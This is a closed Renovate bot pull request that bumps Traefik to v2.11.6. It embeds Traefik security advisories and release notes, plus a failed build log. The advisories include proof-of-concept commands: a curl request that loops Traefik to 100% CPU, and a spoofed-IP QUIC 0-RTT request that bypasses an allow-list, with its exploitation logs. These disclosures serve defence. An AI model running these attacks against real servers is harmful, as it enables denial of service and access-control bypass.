Closed renovate[bot] closed 3 months ago
Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.
♻ Renovate will retry this branch, including artifacts, only when one of the following happens:
The artifact failure details are included below:
Command failed: go get -d -t ./...
go: github.com/stakater/Forecastle/v1/pkg/kube/wrappers imports
github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1: cannot find module providing package github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.
♻ Renovate will retry this branch, including artifacts, only when one of the following happens:
The artifact failure details are included below:
Command failed: go get -d -t ./...
go: github.com/stakater/Forecastle/v1/pkg/kube/wrappers imports
github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1: cannot find module providing package github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
This PR contains the following updates:
v2.9.10 -> v2.11.6
GitHub Vulnerability Alerts
CVE-2023-47106
Summary
When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.
When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control restrictions.
Details
For example, we have this Nginx configuration:
This can be bypassed when the attacker is requesting to /#/../admin
This won’t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.
However, if Nginx is chained with another reverse proxy which automatically URL-encodes the character # (Traefik), the URL will become
/%23/../admin
And allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.
Here is a diagram to summarize the attack:
PoC
This is the POC docker I've set up. It contains Nginx, Traefik proxies and a backend server running PHP.
https://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing
Impact
This allows the attacker to completely bypass the Access Restriction from Front-End proxy.
CVE-2023-47124
Impact
There is a potential vulnerability in Traefik managing the ACME HTTP challenge.
When Traefik is configured to use the HTTPChallenge to generate and renew the Let's Encrypt TLS certificates, the delay authorized to solve the challenge (50 seconds) can be exploited by attackers (slowloris attack).
Patches
Workarounds
Replace the HTTPChallenge with the TLSChallenge or the DNSChallenge.
For more information
If you have any questions or comments about this advisory, please open an issue.
CVE-2023-47633
Summary
The traefik docker container uses 100% CPU when it serves as its own backend, which is an automatically generated route resulting from the Docker integration in the default configuration.
Details
While attempting to set up Traefik to handle traffic for Docker containers, I observed in the webUI a rule with the following information:
Host(traefik-service) | webwebsecure | traefik-service@docker | traefik-service
I assumed that this is something internal; however, I wondered why it would have a host rule on the web entrypoint configured.
So I have sent a request with that hostname with
curl -v --resolve "traefik-service:80:xxx.xxx.xxx.xxx" http://traefik-service
That made my whole server unresponsive. I assume the name comes from a docker container with that name, traefik itself:
PoC
Start traefik with
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 --name foo -p 8080:8080 traefik:v2.10 --api.insecure=true --providers.docker
curl -v --resolve "foo:80:127.0.0.1" http://foo
looks like this creates an endless loop of request.
Knowing the name of the docker container seems to be enough to trigger this, if the docker backend is used.
Impact
Server is unreachable and uses 100% CPU
CVE-2024-28869
There is a potential vulnerability in Traefik managing requests with `Content-length` and no body.
Sending a `GET` request to any Traefik endpoint with the `Content-length` request header results in an indefinite hang with the default configuration. This vulnerability can be exploited by attackers to induce a denial of service.
Patches
Workarounds
For affected versions, this vulnerability can be mitigated by configuring the readTimeout option.
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-7f4j-64p6-5h5v
There is a potential vulnerability in Traefik managing HTTP/2 connections.
More details in the CVE-2023-45288.
Patches
Workarounds
No workaround
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-f7cq-5v43-8pwp
Impact
There is a vulnerability in Go managing malformed DNS message, which impacts Traefik. This vulnerability could be exploited to cause a denial of service.
References
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-7jmw-8259-q9jx
Impact
There is a vulnerability in Go managing various Is methods (IsPrivate, IsLoopback, etc) for IPv4-mapped IPv6 addresses.
They didn't work as expected returning false for addresses which would return true in their traditional IPv4 forms.
References
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-rvj4-q8q5-8grf
Impact
There is a vulnerability in Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.
References
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
CVE-2024-39321
Impact
There is a vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
Original Description
### Summary

Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

### Details

HTTP/3 supports sending HTTP requests as early data during QUIC 0-RTT handshakes to reduce RTT overhead for connection resumptions. Early data is sent and received before the handshake is completed and the client's IP address is validated. The initial packet containing the QUIC 0-RTT handshake information and the early data HTTP request are sent as a single UDP datagram. Due to UDP being used by QUIC, the source IP address can be spoofed. When HTTP/3 servers process early data requests, the application layer only sees the unvalidated - possibly spoofed - IP address.

First, attackers have to obtain a session ticket from the HTTP/3 server. For that, attackers have to establish an HTTP/3 connection to the server - using their real IP address - and wait for the server to send a session ticket. Note that attackers do not have to send an actual HTTP request over the established connection. After obtaining the session ticket, the attacker can close the connection.

In the second step, attackers need to prepare a UDP datagram containing a QUIC initial packet with a TLS ClientHello and the session ticket, a QUIC 0-RTT packet with early data encrypted with the pre-shared key from the session ticket, and an HTTP/3 request (open request stream, HEADERS frame, optionally DATA frame). This prepared UDP datagram can then be sent to the server with an arbitrarily spoofed source IP address in the IP packet header. When processing the HTTP request, the server trusts the spoofed IP address, which can be used to bypass IP-allow/block-lists.

A prerequisite for this attack to succeed is that HTTP/3 servers have implemented and enabled 0-RTT early data for HTTP/3 requests (and no mitigations are in place).

A caveat is that attackers are not able to receive the server's response because the response is sent to the spoofed source IP address, making it a blind attack. Another limitation is that the request has to fit in a single UDP datagram, whose size is limited by the network path's MTU (minus some bytes for headers of encapsulating protocols such as HTTP/3, QUIC, UDP, IPv4/IPv6).

### Impact

IP allow-lists can be bypassed. Early data in QUIC 0-RTT handshakes is enabled when HTTP/3 support is enabled.

### Mitigation

* Consider responding with HTTP status code 425 Too Early when 0-RTT early data requests match `ipAllowList.sourceRange` middleware. See RFC 8470 Section 3 for more information.
* Alternatively, delay processing of 0-RTT early data requests until the handshake is completed and the client's IP address is validated when 0-RTT early data requests match `ipAllowList.sourceRange` middleware.

Additionally, it is recommended to implement RFC 8470 and set the `Early-Data: 1` header when forwarding early data requests to backend services. Currently, applications are not able to distinguish between 0-RTT early data requests and regular requests. When applications use the client's IP in `X-Forwarded-For` headers (e.g. for rate limiting), they are not able to detect potential IP spoofing on the application layer.

### Proof of Concept

Traefik is used as a HTTP/3 reverse proxy for a backend application. An IP allow list is configured to only allow access from the IP address 1.3.3.7.

```yaml
# /etc/traefik/traefik.yml
entryPoints:
  websecure:
    address: ":4439"
    http3: {}
    asDefault: true
providers:
  file:
    filename: /etc/traefik/provider.yml
log:
  level: DEBUG
```

```yaml
# /etc/traefik/provider.yml
http:
  routers:
    default:
      rule: "PathPrefix(`/`)"
      tls: {}
      middlewares:
        - ipfilter
      service: backend
  middlewares:
    ipfilter:
      ipAllowList:
        sourceRange:
          - "1.3.3.7/32"
  services:
    backend:
      loadBalancer:
        servers:
          - url: "http://127.0.0.1:8000"
```

By performing the steps described above, attackers are able to bypass the IP allow list and send requests to the backend application. The security impact depends on the application's logic.

Please find attached a proof-of-concept docker-compose setup to demonstrate the vulnerability. It consists of a traefik reverse proxy, a backend application, and an attacker container. The attack script performs the following request:

```
python3 http3_ip_spoofing.py https://127.0.0.1:4439/cmd -X POST -d "cmd=echo%20worked>>/tmp/spoofed" -H "X-Header: test" --spoofed-ip=1.3.3.7
```

Note: We use a custom python script because `curl` does not support QUIC 0-RTT requests and session resumption yet.

[proof-of-concept.zip](https://togithub.com/user-attachments/files/16044048/proof-of-concept.zip)

Here are logs of a successful exploitation in the attached docker compose setup:

```
docker compose up

# Traefik startup logs
h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:100 > Traefik version 3.0.3 built on 2024-06-18T14:31:20Z version=3.0.3
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/cmd/traefik/traefik.go:107 > Static configuration loaded [json] staticConfiguration={"entryPoints":{"websecure":{"address":":4439","asDefault":true,"forwardedHeaders":{},"http":{},"http2":{"maxConcurrentStreams":250},"http3":{},"transport":{"lifeCycle":{"graceTimeOut":"10s"},"respondingTimeouts":{"idleTimeout":"3m0s","readTimeout":"1m0s"}},"udp":{"timeout":"3s"}}},"global":{"checkNewVersion":true},"log":{"format":"common","level":"DEBUG"},"providers":{"file":{"filename":"/etc/traefik/provider.yml","watch":true},"providersThrottleDuration":"2s"},"serversTransport":{"maxIdleConnsPerHost":200},"tcpServersTransport":{"dialKeepAlive":"15s","dialTimeout":"30s"}}
h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:605 >
h3_traefik-1 | Stats collection is disabled.
h3_traefik-1 | Help us improve Traefik by turning this feature on :)
h3_traefik-1 | More details on: https://doc.traefik.io/traefik/contributing/data-collection/
h3_traefik-1 |
h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:73 > Starting provider aggregator aggregator.ProviderAggregator
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/server_entrypoint_tcp.go:220 > Starting TCP Server entryPointName=websecure
h3_traefik-1 | 2024-06-29T11:52:58Z DBG log/log.go:245 > 2024/06/29 11:52:58 sys_conn.go:36: failed to sufficiently increase receive buffer size (was: 208 kiB, wanted: 2048 kiB, got: 416 kiB). See https://github.com/quic-go/quic-go/wiki/UDP-Buffer-Sizes for details.
h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *file.Provider
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *file.Provider provider configuration config={"filename":"/etc/traefik/provider.yml","watch":true}
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik/provider.yml
h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *traefik.Provider
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *traefik.Provider provider configuration config={}
h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *acme.ChallengeTLSALPN
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *acme.ChallengeTLSALPN provider configuration config={}
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"middlewares":{"ipfilter":{"ipAllowList":{"sourceRange":["1.3.3.7/32"]}}},"routers":{"default":{"middlewares":["ipfilter"],"rule":"PathPrefix(`/`)","service":"backend","tls":{}}},"services":{"backend":{"loadBalancer":{"passHostHeader":true,"responseForwarding":{"flushInterval":"100ms"},"servers":[{"url":"http://127.0.0.1:8000"}]}}}},"tcp":{},"tls":{},"udp":{}} providerName=file
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"serversTransports":{"default":{"maxIdleConnsPerHost":200}},"services":{"noop":{}}},"tcp":{"serversTransports":{"default":{"dialKeepAlive":"15s","dialTimeout":"30s"}}},"tls":{},"udp":{}} providerName=internal
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/aggregator.go:51 > No entryPoint defined for this router, using the default one(s) instead entryPointName=["websecure"] routerName=default
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:321 > No default certificate, fallback to the internal generated certificate tlsStoreName=default
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:259 > Creating load-balancer entryPointName=websecure routerName=default@file serviceName=backend@file
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:301 > Creating server entryPointName=websecure routerName=default@file serverName=754e0da3b063885a serviceName=backend@file target=http://127.0.0.1:8000
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:33 > Creating middleware entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:57 > Setting up IPAllowLister with sourceRange: [1.3.3.7/32] entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/observability/middleware.go:33 > Adding tracing to middleware entryPointName=websecure middlewareName=ipfilter@file routerName=default@file
h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/recovery/recovery.go:22 > Creating middleware entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recover

# Attack script establishes an HTTP/3 connection to traefik to obtain a session ticket
attack-ipspoofing-1 | INFO:client:Initially connecting to server to get a session ticket
attack-ipspoofing-1 | INFO:quic:[e29b2e2fd9a76162] ALPN negotiated protocol h3
attack-ipspoofing-1 | INFO:quic:[e29b2e2fd9a76162] Connection close sent (code 0x0, reason )
attack-ipspoofing-1 | INFO:client:Initial connection done

# Traefik accepts the HTTP/3 connection and issues as session ticket
h3_traefik-1 | 2024-06-29T11:53:03Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:228 > Serving default certificate for request: ""

# Attack script sends a 0-RTT early data request in a UDP datagram with a spoofed source IP
attack-ipspoofing-1 | INFO:client:Building 0-RTT QUIC packet
attack-ipspoofing-1 | INFO:client:Setting up iptables rule for source IP spoofing
attack-ipspoofing-1 | INFO:client:Sending 0-RTT packet

# Traefik accepts and forwards the request to the backend service, bypassing the IP allow list
h3_traefik-1 | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:85 > Accepting IP 1.3.3.7 middlewareName=ipfilter@file middlewareType=IPAllowLister
h3_traefik-1 | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/server/service/loadbalancer/wrr/wrr.go:196 > Service selected by WRR: 754e0da3b063885a

# Backend service receives and processes the request
backend-1 | INFO:root:Request: {"ip": "1.3.3.7", "method": "POST", "path": "/cmd", "data": "cmd=echo%20worked>>/tmp/spoofed", "headers": {"Host": "127.0.0.1:4439", "Content-Length": "31", "Content-Type": "application/x-www-form-urlencoded", "X-Forwarded-For": "1.3.3.7", "X-Forwarded-Host": "127.0.0.1:4439", "X-Forwarded-Port": "4439", "X-Forwarded-Proto": "https", "X-Forwarded-Server": "work", "X-Header": "test", "X-Real-Ip": "1.3.3.7", "Accept-Encoding": "gzip"}}
backend-1 | INFO:root:Executing command: echo worked>>/tmp/spoofed
```

Release Notes
traefik/traefik (github.com/traefik/traefik/v2)
### [`v2.11.6`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2116-2024-07-02) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.5...v2.11.6) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.5...v2.11.6) **Bug fixes:** - **\[ecs]** Fix ECS config for OIDC + IRSA ([#10814](https://togithub.com/traefik/traefik/pull/10814) by [mmatur](https://togithub.com/mmatur)) - **\[http3]** Disable QUIC 0-RTT ([#10867](https://togithub.com/traefik/traefik/pull/10867) by [mmatur](https://togithub.com/mmatur)) - **\[middleware,server]** Remove interface names from IPv6 ([#10813](https://togithub.com/traefik/traefik/pull/10813) by [JeroenED](https://togithub.com/JeroenED)) **Documentation:** - **\[docker,acme]** Fix a typo in the ACME docker-compose docs ([#10866](https://togithub.com/traefik/traefik/pull/10866) by [ciacon](https://togithub.com/ciacon)) - Update Advanced Capabilities Callout ([#10846](https://togithub.com/traefik/traefik/pull/10846) by [tomatokoolaid](https://togithub.com/tomatokoolaid)) - Update maintainers ([#10834](https://togithub.com/traefik/traefik/pull/10834) by [emilevauge](https://togithub.com/emilevauge)) - Fix readme badge for Semaphore CI ([#10830](https://togithub.com/traefik/traefik/pull/10830) by [mmatur](https://togithub.com/mmatur)) - Fix typo in keepAliveMaxTime docs ([#10825](https://togithub.com/traefik/traefik/pull/10825) by [shochdoerfer](https://togithub.com/shochdoerfer)) ### [`v2.11.5`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2115-2024-06-18) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.4...v2.11.5) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.4...v2.11.5) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.17.4 ([#10803](https://togithub.com/traefik/traefik/pull/10803) by [ldez](https://togithub.com/ldez)) **Documentation:** - Update the supported versions table ([#10798](https://togithub.com/traefik/traefik/pull/10798) by 
[nmengin](https://togithub.com/nmengin)) ### [`v2.11.4`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2114-2024-06-10) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.3...v2.11.4) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.3...v2.11.4) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.17.3 ([#10768](https://togithub.com/traefik/traefik/pull/10768) by [ldez](https://togithub.com/ldez)) **Documentation:** - **\[acme]** Fix .com and .org domain examples ([#10635](https://togithub.com/traefik/traefik/pull/10635) by [rptaylor](https://togithub.com/rptaylor)) - **\[middleware]** Add a note about the Ratelimit middleware's behavior when the sourceCriterion header is missing ([#10752](https://togithub.com/traefik/traefik/pull/10752) by [dgutzmann](https://togithub.com/dgutzmann)) - Add user guides link to getting started ([#10785](https://togithub.com/traefik/traefik/pull/10785) by [norlinhenrik](https://togithub.com/norlinhenrik)) - Remove helm default repo warning as repo has been long deprecated ([#10772](https://togithub.com/traefik/traefik/pull/10772) by [corneliusroemer](https://togithub.com/corneliusroemer)) ### [`v2.11.3`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2113-2024-05-17) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.2...v2.11.3) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.2...v2.11.3) **Bug fixes:** - **\[server]** Remove deadlines for non-TLS connections ([#10615](https://togithub.com/traefik/traefik/pull/10615) by [rtribotte](https://togithub.com/rtribotte)) - **\[webui]** Display of Content Security Policy values getting out of screen ([#10710](https://togithub.com/traefik/traefik/pull/10710) by [brandonfl](https://togithub.com/brandonfl)) - **\[webui]** Fix provider icon size ([#10621](https://togithub.com/traefik/traefik/pull/10621) by [framebassman](https://togithub.com/framebassman)) **Documentation:** - **\[k8s/crd]** Fix 
migration/v2.md ([#10658](https://togithub.com/traefik/traefik/pull/10658) by [stemar94](https://togithub.com/stemar94)) - **\[k8s/gatewayapi]** Fix HTTPRoute use of backendRefs ([#10630](https://togithub.com/traefik/traefik/pull/10630) by [sakaru](https://togithub.com/sakaru)) - **\[k8s/gatewayapi]** Fix HTTPRoute path type ([#10629](https://togithub.com/traefik/traefik/pull/10629) by [sakaru](https://togithub.com/sakaru)) - **\[k8s]** Improve mirroring example on Kubernetes ([#10701](https://togithub.com/traefik/traefik/pull/10701) by [mloiseleur](https://togithub.com/mloiseleur)) - Consistent entryPoints capitalization in CLI flag usage ([#10650](https://togithub.com/traefik/traefik/pull/10650) by [jnoordsij](https://togithub.com/jnoordsij)) - Fix unfinished migration sentence for v2.11.2 ([#10633](https://togithub.com/traefik/traefik/pull/10633) by [kevinpollet](https://togithub.com/kevinpollet)) ### [`v2.11.2`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2112-2024-04-11) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.1...v2.11.2) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.1...v2.11.2) **Bug fixes:** - **\[server]** Revert LingeringTimeout and change default value for ReadTimeout ([#10599](https://togithub.com/traefik/traefik/pull/10599) by [kevinpollet](https://togithub.com/kevinpollet)) - **\[server]** Set default ReadTimeout value to 60s ([#10602](https://togithub.com/traefik/traefik/pull/10602) by [rtribotte](https://togithub.com/rtribotte)) ### [`v2.11.1`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2111-2024-04-10) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.0...v2.11.1) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.0...v2.11.1) **Bug fixes:** - **\[acme,tls]** Enforce handling of ACME-TLS/1 challenges ([#10536](https://togithub.com/traefik/traefik/pull/10536) by [rtribotte](https://togithub.com/rtribotte)) - **\[acme]** Update 
go-acme/lego to v4.16.1 ([#10508](https://togithub.com/traefik/traefik/pull/10508) by [ldez](https://togithub.com/ldez))
- **\[acme]** Close created file in ACME local store CheckFile func ([#10574](https://togithub.com/traefik/traefik/pull/10574) by [testwill](https://togithub.com/testwill))
- **\[docker,http3]** Update to quic-go v0.42.0 and docker/cli v24.0.9 ([#10572](https://togithub.com/traefik/traefik/pull/10572) by [mloiseleur](https://togithub.com/mloiseleur))
- **\[docker,marathon,rancher,ecs,tls,nomad]** Allow to configure TLSStore default generated certificate with labels ([#10439](https://togithub.com/traefik/traefik/pull/10439) by [kevinpollet](https://togithub.com/kevinpollet))
- **\[ecs]** Adjust ECS network interface detection logic ([#10550](https://togithub.com/traefik/traefik/pull/10550) by [amaxine](https://togithub.com/amaxine))
- **\[logs,tls]** Fix log when default TLSStore and TLSOptions are defined multiple times ([#10499](https://togithub.com/traefik/traefik/pull/10499) by [rtribotte](https://togithub.com/rtribotte))
- **\[middleware]** Allow empty replacement with ReplacePathRegex middleware ([#10538](https://togithub.com/traefik/traefik/pull/10538) by [rtribotte](https://togithub.com/rtribotte))
- **\[plugins]** Update Yaegi to v0.16.1 ([#10565](https://togithub.com/traefik/traefik/pull/10565) by [ldez](https://togithub.com/ldez))
- **\[provider,rules]** Don't allow routers higher than internal ones ([#10428](https://togithub.com/traefik/traefik/pull/10428) by [ldez](https://togithub.com/ldez))
- **\[rules]** Reserve priority range for internal routers ([#10541](https://togithub.com/traefik/traefik/pull/10541) by [youkoulayley](https://togithub.com/youkoulayley))
- **\[server,tcp]** Introduce Lingering Timeout ([#10569](https://togithub.com/traefik/traefik/pull/10569) by [rtribotte](https://togithub.com/rtribotte))
- **\[tcp]** Enforce failure for TCP HostSNI with hostname ([#10540](https://togithub.com/traefik/traefik/pull/10540) by
[youkoulayley](https://togithub.com/youkoulayley))
- **\[tracing]** Bump Elastic APM to v2.4.8 ([#10512](https://togithub.com/traefik/traefik/pull/10512) by [rtribotte](https://togithub.com/rtribotte))
- **\[webui]** Fix dashboard exposition through a router ([#10518](https://togithub.com/traefik/traefik/pull/10518) by [mmatur](https://togithub.com/mmatur))
- **\[webui]** Display IPAllowlist middleware configuration in dashboard ([#10459](https://togithub.com/traefik/traefik/pull/10459) by [youkoulayley](https://togithub.com/youkoulayley))
- **\[webui]** Make text more readable in dark mode ([#10473](https://togithub.com/traefik/traefik/pull/10473) by [hood](https://togithub.com/hood))
- **\[webui]** Migrate to Quasar 2.x and Vue.js 3.x ([#10416](https://togithub.com/traefik/traefik/pull/10416) by [andsarr](https://togithub.com/andsarr))
- **\[webui]** Add a horizontal scroll for the mobile view ([#10480](https://togithub.com/traefik/traefik/pull/10480) by [framebassman](https://togithub.com/framebassman))

**Documentation:**

- **\[acme]** Update gandiv5 env variable in providers table ([#10506](https://togithub.com/traefik/traefik/pull/10506) by [dominiwe](https://togithub.com/dominiwe))
- **\[acme]** Fix multiple dns provider documentation ([#10496](https://togithub.com/traefik/traefik/pull/10496) by [mmatur](https://togithub.com/mmatur))
- **\[docker]** Fix paragraph in entrypoints and Docker docs ([#10491](https://togithub.com/traefik/traefik/pull/10491) by [luigir-it](https://togithub.com/luigir-it))
- **\[k8s]** Improve middleware example ([#10532](https://togithub.com/traefik/traefik/pull/10532) by [mloiseleur](https://togithub.com/mloiseleur))
- **\[metrics]** Fix host header mention in prometheus metrics doc ([#10502](https://togithub.com/traefik/traefik/pull/10502) by [MorphBonehunter](https://togithub.com/MorphBonehunter))
- **\[metrics]** Fix typo in statsd metrics docs ([#10437](https://togithub.com/traefik/traefik/pull/10437) by
[xpac1985](https://togithub.com/xpac1985))
- **\[middleware]** Improve excludedIPs example with IPWhiteList and IPAllowList middleware ([#10554](https://togithub.com/traefik/traefik/pull/10554) by [mloiseleur](https://togithub.com/mloiseleur))
- **\[nomad]** Improve documentation about Nomad ACL minimum rights ([#10482](https://togithub.com/traefik/traefik/pull/10482) by [Thadir](https://togithub.com/Thadir))
- **\[server]** Add specification for TCP TLS routers in documentation ([#10510](https://togithub.com/traefik/traefik/pull/10510) by [shivanipawar00](https://togithub.com/shivanipawar00))
- **\[tls]** Fix default value for peerCertURI option ([#10470](https://togithub.com/traefik/traefik/pull/10470) by [marcmognol](https://togithub.com/marcmognol))
- Update releases page ([#10449](https://togithub.com/traefik/traefik/pull/10449) by [ldez](https://togithub.com/ldez))
- Update releases page ([#10443](https://togithub.com/traefik/traefik/pull/10443) by [ldez](https://togithub.com/ldez))
- Add youkoulayley to maintainers ([#10517](https://togithub.com/traefik/traefik/pull/10517) by [emilevauge](https://togithub.com/emilevauge))
- Add sdelicata to maintainers ([#10515](https://togithub.com/traefik/traefik/pull/10515) by [emilevauge](https://togithub.com/emilevauge))

**Misc:**

- **\[webui]** Modify the Hub Button ([#10583](https://togithub.com/traefik/traefik/pull/10583) by [mdeliatf](https://togithub.com/mdeliatf))

### [`v2.11.0`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2110-2024-02-12)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.7...v2.11.0)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.11.0-rc1...v2.11.0)

**Enhancements:**

- **\[middleware]** Deprecate IPWhiteList middleware in favor of IPAllowList ([#10249](https://togithub.com/traefik/traefik/pull/10249) by [lbenguigui](https://togithub.com/lbenguigui))
- **\[redis]** Add Redis Sentinel support
([#10245](https://togithub.com/traefik/traefik/pull/10245) by [youkoulayley](https://togithub.com/youkoulayley))
- **\[server]** Add KeepAliveMaxTime and KeepAliveMaxRequests features to entrypoints ([#10247](https://togithub.com/traefik/traefik/pull/10247) by [juliens](https://togithub.com/juliens))
- **\[sticky-session]** Hash WRR sticky cookies ([#10243](https://togithub.com/traefik/traefik/pull/10243) by [youkoulayley](https://togithub.com/youkoulayley))

**Bug fixes:**

- **\[acme]** Update go-acme/lego to v4.15.0 ([#10392](https://togithub.com/traefik/traefik/pull/10392) by [ldez](https://togithub.com/ldez))
- **\[authentication]** Fix NTLM and Kerberos ([#10405](https://togithub.com/traefik/traefik/pull/10405) by [juliens](https://togithub.com/juliens))
- **\[file]** Fix file watcher ([#10420](https://togithub.com/traefik/traefik/pull/10420) by [juliens](https://togithub.com/juliens))
- **\[file]** Update github.com/fsnotify/fsnotify to v1.7.0 ([#10313](https://togithub.com/traefik/traefik/pull/10313) by [ldez](https://togithub.com/ldez))
- **\[http3]** Update quic-go to v0.40.1 ([#10296](https://togithub.com/traefik/traefik/pull/10296) by [ldez](https://togithub.com/ldez))
- **\[middleware,tcp]** Add missing TCP IPAllowList middleware constructor ([#10331](https://togithub.com/traefik/traefik/pull/10331) by [youkoulayley](https://togithub.com/youkoulayley))
- **\[nomad]** Update the Nomad API dependency to v1.7.2 ([#10327](https://togithub.com/traefik/traefik/pull/10327) by [jrasell](https://togithub.com/jrasell))
- **\[server]** Fix ReadHeaderTimeout for PROXY protocol ([#10320](https://togithub.com/traefik/traefik/pull/10320) by [juliens](https://togithub.com/juliens))
- **\[webui]** Fixes the Header Button ([#10395](https://togithub.com/traefik/traefik/pull/10395) by [mdeliatf](https://togithub.com/mdeliatf))
- **\[webui]** Fix URL encode resource's id before calling API endpoints ([#10292](https://togithub.com/traefik/traefik/pull/10292) by
[andsarr](https://togithub.com/andsarr))

**Documentation:**

- **\[acme]** Fix TLS challenge explanation ([#10293](https://togithub.com/traefik/traefik/pull/10293) by [cavokz](https://togithub.com/cavokz))
- **\[docker]** Update wording of compose example ([#10276](https://togithub.com/traefik/traefik/pull/10276) by [svx](https://togithub.com/svx))
- **\[docker,acme]** Fix typo ([#10294](https://togithub.com/traefik/traefik/pull/10294) by [youpsla](https://togithub.com/youpsla))
